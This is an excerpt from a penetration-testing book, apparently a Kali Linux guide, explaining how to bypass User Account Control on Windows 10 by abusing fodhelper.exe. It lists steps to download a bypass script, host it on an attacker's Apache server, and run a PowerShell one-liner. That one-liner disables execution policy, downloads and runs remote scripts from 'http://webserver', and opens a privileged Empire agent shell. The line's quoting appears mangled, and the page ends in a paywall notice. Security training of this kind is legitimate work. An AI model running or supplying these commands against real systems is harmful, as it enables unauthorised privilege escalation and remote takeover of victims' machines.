Using fodhelper to bypass UAC in Windows 10

fodhelper.exe is the executable used by Windows to manage features in Windows settings. If the attackers have limited shell or normal user access to the victim system, they can make use of fodhelper.exe to bypass the UAC. This can be achieved by running the following one-line PowerShell script on the command line and gain access to system privileges.

While the HTTP web server is hosted by the attackers, this can be achieved with the following:

  1. Download the bypass script (https://raw.githubusercontent.com/PacktPublishing/Mastering-Kali-Linux-for-Advanced-Penetration-Testing-Third-Edition/master/Chapter%2009/Bypass/FodhelperBypass.ps1)
  2. Spin the service apache2 in Kali Linux
  3. Use cp FodhelperBypass.ps1 /var/www/html/anyfolder/ and then use it using the following:
* Powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://webserver/payload.ps1') FodhelperBypass -program 'cmd.exe /c Powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://webserver/agent.ps1')"

The preceding script will open a new shell to Empire PowerShell with high privilege. We will explore using the Empire in detail in Chapter 10, Exploitation.

..................Content has been hidden....................

You can't read the all page of ebook, please click here login for view all page.
Reset
44.193.77.196